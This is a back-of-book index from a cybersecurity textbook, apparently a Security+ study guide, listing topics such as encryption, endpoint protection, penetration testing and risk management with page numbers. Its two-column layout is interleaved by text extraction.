mail transfer server, 100 symmetric, 39–40, 60–61 registry settings, 275–276
mail user agent, 355 transposition, 39 workstations, 275
mailbox server, 100 of backups, 178 endpoint logs, G-10, 351
metadata, 355–356 Bluetooth, 299 Endpoint Manager, 279, 288
RFC 822 email address, 53 database encryption, 62 endpoint protection, 276–279
security, 311–313 disk and file encryption, antimalware, 277
Domain-based Message 61–62 antivirus software, 277
Authentication, key exchange, 63–64 disk encryption, 277–278
Reporting & levels, 61–62 installing, 288
Conformance, 311–312 database-level isolation, 277
DomainKeys Identified encryption, 62 patch management, 279
Mail, 311 file encryption, 61 segmentation, 276–277
email gateway, 312 full-disk encryption, 61 endpoint protection platform
Secure/Multipurpose partition encryption, 61 (EPP), 351, 364
Internet Mail Extensions, record-level encryption, endpoint security
312–313 62 advanced endpoint
Sender Policy volume encryption, 61 protection, 279–281
Framework, 311 near-field communication, best practice baselines,
services, 309–311 300 274–275
configuring mailbox standards, 417 endpoint configuration,
access protocols on a supporting confidentiality, 281–286
server, 310 60–61 endpoint hardening,
Secure IMAPS, 311 techniques, 287 274–276
Secure POP, 310–311 transport/communication endpoint protection,
Secure SMTP, 309 encryption, 63–64 276–279
Simple Mail Transfer End-of-Life (EOL), 212 hardening specialized
Protocol, 309 endpoint configuration, 281–286 devices, 289–290
soft tokens sent via, 77 access control, 282 hardening techniques,
spam, 264, 304, 311, access control lists, 282–283 286–289
312 application allow lists and implementing, 274–291
embedded systems, G-10, block lists, 284 solutions, S-16
158–159 configuration drift, 281 endpoint security, zero trust
attacks on, 160 configuration enforcement, architectures and, 164
examples, 158 285 energy
Real-Time Operating file system permissions, in ICS/SCADA applications,
Systems, 159 283–284 160
solutions, S-11 group policy, 285 laws and regulations in, 419
Encapsulating Security Payload lack of security controls, 281 enhanced detection and
(ESP), G-10, 132 monitoring, 284–285 response (EDR), 351
encoding, 319 principle of least privilege, enhanced open, 257
Encrypting File System (EFS), 282 enterprise authentication,
61 SELinux, 285–286 G-10, 258
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
enterprise local area network ethical hacking. see penetration external media
(LAN), 102 testing full device encryption, 294
enterprise network ethical principles, in reporting, full disk encryption, 278
architecture, 100–114 344 external threat actors, G-14, 17
architecture and ETSI. see European extortion, G-11, 18
infrastructure concepts, Telecommunications
100–101 Standards Institute (ETSI) IoT F
architecture considerations, Security Standards
fabrication and manufacturing
111–112 European Telecommunications
applications, 160
attack surface, 108–109 Standards Institute (ETSI) IoT
facial recognition, 75
network infrastructure, Security Standards, 162
facilities, 160
101–102 European Union, regulations
factors, G-11, 70
physical isolation, 111 and laws in. see General Data
factory settings, 289
port security, 109–110 Protection Regulation (GDPR)
fail-closed, G-11, 117–118
routing infrastructure evaluation scope, 222–223. see
fail-open, G-11, 117–118
considerations, 104–106 also target of evaluation (TOE)
failover, G-11, 189
security zones, 106–108 Event Viewer, G-10, 349, 351
failover tests, 189, 195
solutions, S-8–9 evidence integrity, 344
failure to enroll rate (FER), 75
switching infrastructure evil twin, G-10, 391
fake telemetry, G-11, 194
considerations, 102–104 exception handling, G-10, 321
false acceptance rate (FAR),
enterprise risk management exception remediation, 247
G-11, 74
(ERM), G-10, 446 exceptions, 321
false match rate (FMR), 74
entropy, 55, 56 executable file, 26
false negatives, G-11, 244, 268,
entry/exit points, 199 Execute (x), in Linux, 283
361
environmental attack, G-10, execution control policy, 284
false non-match rate (FNMR),
385 exemptions, in remediation,
74
environmental design, security 247
false positives, G-11, 244, 268,
through, 199 existing structures, 200–201
361
environmental variables, G-10, expansionary risk appetite, 448
false rejection rate (FRR), G-11,
245–246 explicit TLS, 309, 310
74
EOL. see End-of-Life (EOL) exposure factor (EF), G-10, 245,
Family Educational Rights and
ephemeral, G-10, 64–65, 87 441
Privacy Act (FERPA), 419
EPP. see endpoint protection extended detection and
FAR. see false acceptance rate
platform (EPP) response (XDR), 280, 351
(FAR)
equipment Extensible Authentication
fast identity online (FIDO)
disposal, 417 Protocol (EAP), G-11, 110, 259
universal 2nd factor (U2F), 76,
physically securing, 253 Extensible Authentication
78
equipment room, 104 Protocol over LAN (EAPoL),
fault tolerance, G-11, 187
eradication, in incident G-11, 110, 259
FDE. see full-disk encryption
response, 334–335 Extensible Configuration
(FDE)
ERM. see enterprise risk Checklist Description Format
F-Droid Android application
management (ERM) (XCCDF), 365–366
store, 217
error, 322 eXtensible Markup Language
Federal Information Processing
error handling, 321–322 (XML), G-11, 95
Standards (FIPS), 45, 415, 443
escalated breach, G-10, 478 injection, 403–404
Federal Information Security
escrow, G-10, 57 external assessments,
Modernization Act (FISMA),
ESD. see electrostatic discharge 460–461, 462
417, 418, 419, 420
(ESD) external compliance reporting,
federation, G-11, 93–94
ESP. see Encapsulating Security 481
feedback, in security
Payload (ESP) external examination, 462
awareness training, 496
espionage, 21 external hard drives, full disk
fencing, G-11, 199
EternalBlue exploit, 211 encryption and, 278
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
FER. see failure to enroll rate transparent, 119 fully qualified domain name
(FER) web application, 127 (FQDN), 51, 52, 102
FERPA. see Family Educational firewalls logs, G-11, 352–353
Rights and Privacy Act (FERPA) firmware, 342 G
FIDO2/WebAuthn, 78 peripheral device with
Galois Counter Mode (GCM),
FIDO/U2F. see fast identity malicious, 299
306
online (FIDO) universal 2nd port protection, 286
gamification, 490–491
factor (U2F) updates, 289, 298
gap analysis, G-12, 4–5
field devices, 160 vulnerabilities, 213, 279
Gartner
file integrity monitoring (FIM), first responder, G-11, 331
“Magic Quadrant” reports,
G-11, 280–281 FISMA. see Federal Information
280
file system Security Modernization Act
market analysis, 268
malicious code, 381 (FISMA)
gateways, 201–202. see also
permissions, 283–284 “Five Whys” model, 335
locks
snapshots, 177 5 GHz network, 254, 256
GCMP. see AES Galois Counter
File Transfer Protocol (FTP), flexibility, vendor diversity and,
Mode Protocol (GCMP)
G-11, 309 193
GDPR. see General Data
fileless malware, 374 flow label, 363
Protection Regulation (GDPR)
files flow record, 363
General Data Protection
in e-discovery, 345 FMR. see false match rate (FMR)
Regulation (GDPR), 179, 240,
encryption, 61–62 FNMR. see false non-match
313, 418, 419, 420, 473, 475,
metadata, 355 rate (FNMR)
476–477, 479
transfer services, 309 forced proxy servers, 122–123
generators, 191
FileVault, 61 Forcepoint, 227
Generic Security Services
FIM. see file integrity Forcepoint Insider Threat,
Application Program Interface
monitoring (FIM) 281
(GSSAPI), 136
financial data, G-11, 471 forensics. see digital forensics
geofencing, G-12, 295, 296
financial interests, 454 forgery attacks, G-11, 401–403
geographic access
financial motivations, of threat cross-site request forgery,
requirements, 473–474
actors, 18 401–402
geographic dispersion, G-12,
financial services, laws and server-side request forgery,
188
regulations in, 419 402–403
geographic restrictions, 474,
fingerprint recognition, 75, 463 Fortify, 320
482
FIPS. see Federal Information Forum of Incident Response
GeoIP, 86
Processing Standards (FIPS) and Security Teams, 243
geolocation, G-12, 86
firewalls, 118–119 forward proxy servers,
geo-redundant storage (GRS),
configuration enforcement, 122–123, 227
148
285 forwarding functions, 101
GeoTrust, 48
device placement and FQDN. see fully qualified
GLBA. see Gramm-Leach-Bliley
attributes, 118–119 domain name (FQDN)
Act (GLBA)
hardware security, 254 fraud, G-11, 18
global law, 418
host-based, 287 Freenet, 237
Global Positioning System
layer 4, 120 FRR. see false rejection rate
(GPS), G-12, 86, 294, 296
layer 7, 121 (FRR)
Assisted GPS, 296
logical ports, 287 FTP. see File Transfer Protocol
GPS tagging, 295
misconfigured, 233 (FTP)
jamming or even spoofing,
next-generation, 125 FTPES. see Explicit TLS (FTPES)
296
packet filtering, 118, 264 FTPS, G-12, 304, 305, 309
Google App Engine, 144
router, 119 full device encryption and
Google BeyondCorp, 167
rules in access control list, external media, 294
Google Chrome, 323
263, 264 full-disk encryption (FDE), G-12,
Google G Suite, 144
stateful inspection, 120 61, 277, 278, 287
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
HIDS. see host intrusion hosted private cloud, 142 IaC. see infrastructure as code
detection systems (HIDS) host-to-host tunnel, 130 (IaC)
high availability (HA), G-13, 148, hot site, G-13, 188 IAM. see identity and access
186–189 hot storage, 148 management (IAM); Identity
across zones, 148 HOTP. see HMAC-based one- and access management (IAM)
cloud as disaster recovery, time password (HOTP) IBM
188–189 hotspots, tethering and, 297 MaaS360, 293
downtime, calculating, 187 HR. see Human Resources (HR) QRadar User Behavior
fault tolerance and HSM. see hardware security Analytics, 281
redundancy, 187 module (HSM) X-Force Exchange, 234, 236
scalability and elasticity, HTML5 VPN, G-13, 134 ICSs. see industrial control
187 HttpOnly attribute, 319 systems (ICSs)
site considerations, 188 Human Resources (HR) ICV. see Integrity Check Value
testing redundancy and, identity and access (ICV)
189 management, 412, 413 identification, G-13, 5
HIPAA. see Health Insurance incident response, 330 files, in e-discovery, 345
Portability and Accountability information security in IAM, 5–6
Act (HIPAA) competencies, 11 in NIST Cybersecurity
HIPS. see host-based intrusion onboarding, 412, 413 Framework, 3
prevention (HIPS) personnel management, identity and access
hiring (recruitment), 412 412 management (IAM), G-13, 5–6,
HKDF. see hash key derivation human vectors, 30 412, 413
function (HKDF) human-machine interfaces authentication, 70–80
HMAC. see hash-based (HMIs), G-13, 159 authorization, 81–88
message authentication code human-readable data, G-13, identity management,
(HMAC) 471 89–97
HMAC-based one-time hybrid architecture, 143 zero trust architectures
password (HOTP), 76 hybrid cloud, G-13, 143–144 and, 164
home appliances, as hybrid governance structures, identity management, 89–97
embedded system, 158 421 directory services, 90–91
Homeland Security Act, 443 hybrid password attack, G-13, federation, 93–94
honeyfiles, 194 394 Linux authentication, 90
honeynets, 194 hybrid/remote work training, Open Authorization, 96
honeypots, G-13, 194 492 Security Assertion Markup
honeytokens, 194 Hypertext Transfer Protocol Language, 95
horizontal privilege escalation, (HTTP) single sign-on
G-13, 400 file download, 309 authentication, 91–92
host intrusion detection file transfer, 309 single sign-on
systems (HIDS), G-13, 265, protocol security, 304, 305 authorization, 92–93
280–281, 287 Transport Layer Security, solutions, S-7–8
host key, 135 305 Windows authentication, 89
host node, 101 Hypertext Transfer Protocol identity proofing, 84
host operating system logs, Secure (HTTPS) identity provider (IdP), G-13, 94
349–350 default port, 306 identity theft, 478
Linux logs, 350 protocol security, 304, 305 IdenTrust, 48
macOS logs, 350 Transport Layer Security, IdP. see identity provider (IdP)
Windows logs, 350 305, 306 IDS. see intrusion detection
host-based firewalls, G-13, hypervisors, 213 systems (IDS)
287 IEC. see International
host-based intrusion I Electrotechnical Commission
prevention (HIPS), G-13, 265, IaaS. see infrastructure as a (IEC)
280–281, 287 service (IaaS) IEEE 802.1X, G-13, 109–110
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
IPS. see indoor positioning jump servers, G-15, 137 kill chain, G-15–16, 332–333
system (IPS); intrusion just-in-time (JIT), 87 KMIP. see Key Management
prevention systems (IPS) JWT. see JSON Web Token (JWT) Interoperability Protocol (KMIP)
IPsec. see Internet Protocol KMS. see key management
Security (IPsec) K systems (KMS)
IPS/IDS log, G-13, 358 knowledge-based
KDC. see key distribution
IR. see incident reporting (IR); authentication, 89
center (KDC)
incident response (IR) known environment
KEK. see key encryption key
IRC. see internet relay chat (IRC) penetration testing, 239,
(KEK)
ISACs. see Information Sharing 464
Kerberos, G-15, 91–93, 94,
and Analysis Centers (ISACs) KPI. see key performance
136, 394
ISAs. see Interconnection indicator (KPI)
Kerckhoffs’s principle, 216
Security Agreements (ISAs) KRA. see key recovery agent
key, 39
ISMS. see information security (KRA)
escrow, 57
management system (ISMS) KRACK attack, 215, 392
expiration, 55
ISO. see International KRI. see key risk indicator (KRI)
generation, 55–56
Organization for
management, 55, 417
Standardization (ISO)
pair, 41, 51, 55, 60, 62, 64 L
ISOC best practice guide
recovery, 392 LAN. see local area network
to evidence collection and
renewal, 55 (LAN)
archiving, 341
revocation, 55 Lansweeper, 173
isolation, G-15, 277
rotation, 216 laptops, full disk encryption
endpoint protection, 277
secret, 39 and, 278
isolation-based
session, 63, 394 LastPass password manager,
containment, 334
storage, 55 73
ISP. see Internet service
key distribution center (KDC), lateral movement, G-16, 387,
provider (ISP)
G-15, 91–93 397
ISSO. see Information Systems
point-of-failure, 93 law enforcement agencies, 422
Security Officer (ISSO)
single sign-on layers
IT Infrastructure Library (ITIL),
authentication, 91–92 firewall, 125–126
G-15, 174
single sign-on layer 1 (inline) firewall,
authorization, 92–93 119
J key encryption key (KEK), G-15, layer 2 (bridged) firewall,
jailbreaking, G-15, 217 60, 278 119
jamming, of GPS, 296 key exchange, G-15, 63–64 layer 3 (routed) firewall,
JavaScript, 373 key fob token generator, 76–77 118
JavaScript Object Notation key length, G-15, 40–41, 417 layer 4 firewall, G-16,
(JSON), G-15, 96, 151 key lock, 201 120
JEDI. see Joint Enterprise Key Management layer 7 firewall, G-16,
Defense Infrastructure (JEDI) Interoperability Protocol 121
JFS. see Journaled File System (KMIP), 55 load balancers
(JFS) key management systems layer 4, 126
Jira, 185 (KMS), G-15, 55, 216 layer 7 (content switch),
JIT. see just-in-time (JIT) key performance indicator 126
Joe Sandbox, 323–324 (KPI), 451 network infrastructure,
Joint Enterprise Defense key recovery agent (KRA), 57 101–106, 108
Infrastructure (JEDI), 167 Key Reinstallation Attacks LDAP. see Lightweight Directory
Journaled File System (JFS), 178 (KRACK) vulnerability, 215 Access Protocol (LDAP)
journaling, G-15, 178 key risk indicator (KRI), 447 LDAP Secure (LDAPS), 304,
JSON. see JavaScript Object key stretching, G-15, 65 307–308
Notation (JSON) keyless lock, 201 least privilege permission
JSON Web Token (JWT), 96 keyloggers, G-15, 375 assignments, 83–84
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
application and cloud multi-tenant (or public) cloud, NDAs. see non-disclosure
monitors, 364 142 agreements (NDAs)
data loss prevention, mutual authentication, 93 near-field communication
365 (NFC), G-18, 76, 202, 257, 300,
logs, 364 N 386
system monitor, 364 NERC. see North American
NAC. see network access
testing, 189 Electric Reliability Corporation
control (NAC)
vulnerability scanners, (NERC)
NAS device, 259
364 Nessus, 173, 231, 242
NAT. see network address
motion recognition, 204 NetApp, 177
translation (NAT)
motion-based alarm, 204 NetFlow, G-18, 363
national cybersecurity
motivations of threat actors, network access control (NAC),
agencies, 422
17–19 G-18, 251, 260–261
National Institute of Standards
chaotic, 18 network address translation
and Technology (NIST),
data exfiltration, 18 (NAT), 134
G-17–18, 3
disinformation, 18 Network and Information
benchmarks, 252
financial, 18 Systems (NIS) Directive, 418,
Cybersecurity Framework,
political, 19 420
3, 240
service disruption, 18 network attack, G-18, 386–387
800-53 framework
MOU. see memorandum of command and control,
requirements, 366
understanding (MoU) beaconing, and persistence,
internal assessments
Mozilla Thunderbird, 311 387
required by, 462
MS08-067 vulnerability, 211 credential harvesting, 386
National Initiative for
MS17-010 update, 211 data exfiltration, 387
Cybersecurity Education,
MSA. see master service denial of service, 386
11, 490
agreement (MSA) lateral movement, pivoting,
National Vulnerability
MSP. see managed services and privilege escalation, 387
Database, 234, 243
provider (MSP) reconnaissance, 386
password best practices
MTA. see message transfer weaponization, delivery,
and, 72
agent (MTA) and breach, 386
Risk Management
MTBF. see mean time between network attack indicators,
Framework, 446
failures (MTBF) 385–407
security controls classified
MTD. see maximum tolerable application attacks, 399–400
by, 9
downtime (MTD) credential replay attacks,
Special Publication 800-61,
MTTR. see mean time to repair/ 394–395
413
replace/recover (MTTR) cryptographic attacks,
Special Publication 800-63,
MUA. see mail user agent 396–397
415
(MUA) denial of service attacks,
Special Publication 800-82,
multi-cloud architectures, G-17, 387–388
160
142 domain name system
standardized configuration
multi-cloud strategies, 193–194 attacks, 390–391
baselines, 285
multifactor authentication forgery attacks, 401–403
Triple DES deprecated by,
(MFA), G-17, 73–74 injection attacks, 403–406
215
biometric or inherence malicious code indicators,
zero trust architecture
factor, 73 397
framework, 163, 165
location-based network attacks, 386–387
National Vulnerability
authentication, 74 on-path attacks, 389–390
Database (NVD), 234, 243
ownership factor, 73, 76, 77 password attacks, 393–394
nation-state actors, G-17,
privileged access physical attacks, 385–386
20
management, 87 replay attacks, 400–401
NBAD. see network behavior
multipartite, 373 solutions, S-21
and anomaly detection (NBAD)
multi-tenant architecture, 143 wireless attacks, 391–392
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
PDF documents with JavaScript persistence (load balancing), controls, 8–9, 198
enabled, 373 G-20, 127, 387, 397 existing structures, 200–201
PDU. see power distribution persistent storage, 275 fencing, 199
unit (PDU) personal area networks (PANs), gateways and locks, 201–202
PEAP, 259 G-20, 297 industrial camouflage,
peer-to-peer (P2P) networks, personal assets, 414 200
66, 147 personal data, 418 lighting, 199
penalties, for noncompliance, personal identification number physical access control
480 (PIN), G-20, 71, 74, 76, 256–257 system, 202
penetration tester vs. attacker, Personal Information security guards, 203
223 Protection and Electronic sensors, 205
penetration testing, G-20, Documents Act (PIPEDA), 418 solutions, S-12–13
238–239, 455, 463–466 personal relationships, 455 standards, 416–417
active reconnaissance, personally owned devices in testing, 466
463–464 the workplace, use of, 489 through environmental
continuous pentesting, 466 personnel management, 412 design, 199
defensive penetration personnel policies, 488–497 video surveillance, 203–204
testing, 466 conduct policies, 488–489 Pi-hole, 314
exercise types, 465–466 solutions, S-26 PIN. see personal identification
integrated penetration training topics and number (PIN)
testing, 466 techniques, 490–494 (see PIPEDA. see Personal
known environment also security awareness Information Protection and
penetration testing, 239, training) Electronic Documents Act
464 user and role-based (PIPEDA)
offensive penetration training, 489–490 PIR sensors. see passive
testing, 465 persuasive/consensus/liking, infrared (PIR) sensors
partially known 31 pivoting, G-20, 387, 397
environment penetration PFS. see perfect forward PKCS. see public key
testing, 239, 464, 465 secrecy (PFS) cryptography standards (PKCS)
passive reconnaissance, PGP (Pretty Good Privacy), 287 PKI. see public key
464 pharming, G-20, 33 infrastructure (PKI)
physical penetration phishing, G-20, 32, 304, 311, platform as a service (PaaS),
testing, 466 312, 313 G-20, 144–145
solutions, S-24–25 campaigns, 493 platform diversity, 192
steps in, 463 simulations, 496 platform-agnostic solutions,
unknown environment physical access control system 293
penetration testing, 238, (PACS), 202 plausible deniability, 20
464, 465 physical attacks, G-20, 385–386 playbooks, G-20, 333, 413
people, authenticating, 6 brute force physical attack, PLCs. see Programmable Logic
percent encoding, G-20, 406 385 Controllers (PLCs)
perfect forward secrecy (PFS), environmental attack, 385 pluggable authentication
G-20, 64–65 RFID cloning, 385–386 module (PAM), G-20, 90
performance indicators, 496 RFID skimming, 386 plug-ins, 242–243, 268
perimeter network, 265 physical isolation, 111 PMK. see pairwise master key
perimeter security, physical locks, 201 (PMK)
overdependence on, 109 physical penetration testing, PNAC. see Port-based Network
peripherals, malicious, 299 G-20, 466 Access Control (PNAC)
permissions, G-20, 81 physical security, 198–206 point-of-sale (PoS) machines,
Bluetooth, 299 alarm systems, 204 300
permissions assignment, barricades and entry/exit Point-to-Point Tunneling
creating, 85 points, 199 Protocol (PPTP), G-20,
restrictions, 294, 295, 483 bollards, 199–200 130
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
reduction, 444 RNA. see retrospective network SAML. see security assertion
remediation, 444 analysis (RNA) markup language (SAML)
response, identifying, 446 robotics, 204 Samsung Pay, 300
sharing, 444 RoE. see rules of engagement SAN. see Storage Area Network
risk acceptance, G-23, 444–445 (RoE) (SAN); subject alternative name
risk analysis, G-23, 441 rogue access points, 391–392 (SAN)
risk analysis using words, not rogue server, 309 sanctions, 479
numbers, 442 ROI. see return on investment sandboxing, G-24, 323–324
Risk and Control Self- (ROI) sandbox execution, 380
Assessment (RCSA), 446 role-based access control sandboxed lab system, 286
risk appetite, G-23, 445, 447, (RBAC), G-24, 82–83, 282 sanitization, G-24, 179, 213
448 roles and responsibilities, in Sarbanes-Oxley Act (SOX),
risk assessment, G-23, 16, rules of engagement, 458 G-24, 252, 417, 443
440–441 root cause analysis, G-24, 335 SASE. see Secure Access Service
risk avoidance, G-23, 444 root certificate authority, G-24, Edge (SASE)
risk deterrence, G-23, 444 49 SASL. see Simple
risk exception, G-23, 444 root of trust model, 49–50 Authentication and Security
risk exemption, G-23, 445 rooting, G-24, 216 Layer (SASL)
risk identification, G-23, 440 rootkits, 373, 377 SAST. see static and dynamic
Risk Management Framework round robin scheduling, 126 application security testing
(RMF), 446 routed (layer 3) firewall, 118 (SAST)
risk management processes router firewall, G-24, 119 satellites, in GPS, 296
and concepts, G-23, 440–452 routers, 102, 253 SAW. see secure administrative
business impact analysis, routing infrastructure workstation (SAW)
448–451 considerations, 104–106 SBOM. see software bill of
heat map, 443 Internet Protocol, 104–105 materials (SBOM)
inherent risk, 442–443 virtual LANs, 105–106 SCA. see software composition
qualitative risk analysis, 442 RPO. see recovery point analysis (SCA)
quantitative risk analysis, objective (RPO) SCADA. see supervisory control
441–442 RSA. see Rivest, Shamir, and data acquisition (SCADA)
risk analysis, 441 Adelman (RSA) scalability, G-24, 111
risk assessment, 440–441 RTO. see recovery time of cloud architecture
risk identification, 440 objective (RTO) features, 154
risk management RTOS. see real-time operating data backups, 175
processes, 445–448 systems (RTOS) high availability, 187
risk management rule-based access control, power provisioning, 155
strategies, 444–445 G-24, 83 SCAP. see Security Content
solutions, S-23–24 rules of engagement (RoE), Automation Protocol (SCAP)
risk mitigation, G-23, 444 G-24, 458 SCAP Compliance Checker
risk owner, G-23, 447 (SCC), 252
risk register, G-23–24, 446 S scareware, 378
risk reporting, G-24, 448 SCC. see SCAP Compliance
SA. see security association (SA)
risk threshold, G-24, 447 Checker (SCC)
SaaS. see software as a service
risk tolerance, G-24, 246, 447 SCCM. see System Center
(SaaS)
risk transference, G-24, 112, Configuration Manager (SCCM)
SAE. see Simultaneous
444 scheduling algorithm, 126
Authentication Of Equals (SAE)
risky behaviors, recognizing, scope, of incident response,
Salesforce, 144
493–494 332
salt, G-24, 65
risky login policy, 86 screened subnet, G-24, 265
SAM. see Security Account
Rivest, Shamir, Adelman (RSA), script virus, 373
Manager (SAM)
42, 45, 49, 60, 216, 306 scripting, automation and,
SameSite attribute, 319
433–434
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
SD card slot. see Micro Secure Secure File Transfer Protocol security architecture
Digital (SD) card slot (SFTP), G-24–25, 135, 216, 304, mapping course content,
SDLC. see software 309 A-8–11
development life cycle (SDLC) secure hash algorithm (SHA), resilience, 171
SDN. see software defined G-25, 43, 306, 344 review, 223
networking (SDN) SHA-1, 215 security assertion markup
SD-WAN. see software-defined SHA256, 43, 44, 68, 306, language (SAML), G-25, 95
WAN 307, 393 security association (SA), 133
SEAndroid, 286 SHA384, 306 security awareness training,
search, in e-discovery, 345 SHA512, 68 491–496
secret (confidential) data, 472, secure IMAP (IMAPS), 304, hybrid/remote work
474. see also privacy data 311 training, 492
secret key, 39 secure management protocols, insider threat training, 491
Secure Access Service Edge 253 lifecycle, 494–496
(SASE), G-24, 156 secure password transmission, assessments and
secure administrative 416 quizzes, 495
workstation (SAW), 87, 126 Secure POP (POP3S), 310–311 development and
secure baseline, G-24, 252. see secure protocols, 304–305 execution of training,
also network security baselines Secure Shell (SSH), G-25, 90, 495
secure coding techniques, 135–136, 309 illustrated, 494
318–321 client authentication, incident reporting, 495
code signing, 320–321 135–136 metrics and
cookies, 319 Kerberos, 136 performance indicators,
input validation, 318–319 public key 496
static code analysis, authentication, 135 observations and
319–320 username/password, feedback, 496
secure communications, 135 phishing simulations,
129–138 commands, 136 496
Internet Key Exchange, Secure SMTP (SMTPS), 304, reporting and
133–134 309 monitoring, 495–496
internet protocol security secure transmission of training completion
tunneling, 132–133 credentials, 412 rates, 496
jump servers, 137 Secure/Multipurpose Internet operational security
out-of-band management, Mail Extensions (S/MIME), 287, training, 492
136–137 312–313 password management
remote access architecture, security training, 491
129–130 changes, 429 phishing campaigns, 493
remote desktop, 134 compliance, 479–480 policy and handbook
Secure Shell, 135–136 controls, lack of, 281 training, 491
solutions, S-9–10 in e-discovery, 345 removable media and cable
transport layer security groups, 434 training, 491
tunneling, 130–132 guards, 203 risky behaviors, recognizing,
secure configuration of key, 76 493–494
servers, 254 operations, mapping course situational awareness
secure data destruction, content, A-11–18 training, 491
179–180 requirements, in rules of social engineering training,
secure directory services, engagement, 458 492
307–308 standards, 290 security concepts
secure email transmission zero trust architectures access control, 5–6
(SMTP), 216 and, 164 authentication,
secure enclaves, G-24, Security Account Manager authorization, and
57 (SAM), 89, 394–395 accounting, 6
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
identity and access business units, 11–12 in incident response, 329, 331
management, 5–6 DevSecOps, 12 intelligence fusion
CIA Triad, 2 incident response, 12 techniques, 338
gap analysis, 4–5 security operations log aggregation, 359
information security center, 11–12 packet captures, 354
(infosec), 2 information security solutions, S-19–20
mapping course content, competencies, 11 security key, G-25, 76
A-1–4 information security roles Security Knowledge
NIST Cybersecurity and responsibilities, 10–11 Framework, 318
Framework, 3 Chief Information security log, G-25, 349
non-repudiation, 2 Officer, 10 Security Onion, 266–267, 331,
security controls, 8–13 Chief Security Officer, 10 338, 353, 388
categories of, 8–9 Chief Technology security operations center
functional types of, 9–10 Officer, 10 (SOC), 11–12, 330
information security Information Systems security orchestration,
business units, 11–12 Security Officer, 11 automation and response
information security outcomes achieved by (SOAR), 329
competencies, 11 implementing, 4 security program management
information solutions, S-1–2 and oversight, mapping course
security roles and security governance content, A-18–22
responsibilities, 10–11 automation, 433–436 Security Technical
outcomes are achieved orchestration Implementation Guides
by implementing, 4 implementation, (STIGs), 252
solutions, S-1 435–436 security zones, G-25, 106–108
Security Content Automation scripting, 433–434 Security-Enhanced Linux
Protocol (SCAP), G-25, 243, 252, change management, (SELinux), G-25, 285–286
365–366 425–432 SED. see self-encrypting drive
Compliance Checker, 252 allowed and blocked (SED)
Extensible Configuration changes, 427–428 segmentation, 246, 483
Checklist Description dependencies, 429 endpoint protection,
Format, 365–366 documentation and 276–277
Open Vulnerability and version control, 430–431 logical, 104
Assessment Language, downtime, 428–430 segmentation-based
365 legacy systems and containment, 334
security controls, G-25, 8–13 applications, 430 SEH. see structured exception
actively testing, 463 programs, 425–427 handler (SEH)
bypassing, 463 restarts, 428–429 selection of effective controls,
categories of, 8–9 governance and G-25, 115
managerial, 8–9 accountability, 420–423 self-assessments, 461
operational, 8–9 legal environment, 417–420 self-encrypting drive (SED),
physical, 8–9 policies, 410–411 G-25, 61, 278
technical, 8–9 procedures, 412–414 self-signed certificate, G-25, 50
function of, 8 standards, 414–417 SELinux. see Security-Enhanced
functional types of, security identifier (SID), G-25, Linux (SELinux)
9–10 85, 92 Sender Policy Framework (SPF),
compensating, 10 security information and event G-25, 304, 311, 312
corrective, 9, 10 management (SIEM), G-25, 174, sensitive data, 473
detective, 9, 10 236, 268, 358–359 sensors, G-25, 117, 123, 205, 359
deterrent, 10 agent-based and agentless infrared sensors, 205
directive, 9 collection, 359 microwave sensors, 205
preventive, 9, 10 for automated reports, 348 pressure sensors, 205
information security endpoint logs, 351 ultrasonic sensors, 205
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
threat vectors, 16, 23–27 TOTP. see time-based one-time Trojans, G-29, 26, 372
human vectors, 30 password (TOTP) true negatives, 362
lure-based vectors, 26–27 TP-LINK SOHO access point, true random number
message-based vectors, 27 256 generator (TRNG), 55
network vectors, 25–26 TPM. see trusted platform Trusted Computing Group
vulnerable software module (TPM) (TCG), 278
vectors, 24–25 tracking cookies, 375 trusted execution environment
3DES. see Triple DES (3DES) trade secrets, G-28, 471 (TEE), 57, 482
throughput (speed), 75 training, 337, 412 trusted platform module
ticket granting service (TGS), training topics and techniques, (TPM), G-29, 56, 62, 277
91–93, 136 490–494 TTP. see tactic, technique, or
illustrated, 93 anomalous behavior procedure (TTP)
session key, 92 recognition, 493 tunnel mode, 132
single sign-on computer-based training, tunnel/tunneling, G-29, 129–130
authentication, 91–92 490–491 internet protocol security
single sign-on gamification, 490–491 tunneling, 132–133
authorization, 92–93 phishing campaigns, 493 transport layer security
ticket, 92 Risky behaviors, tunneling, 130–132
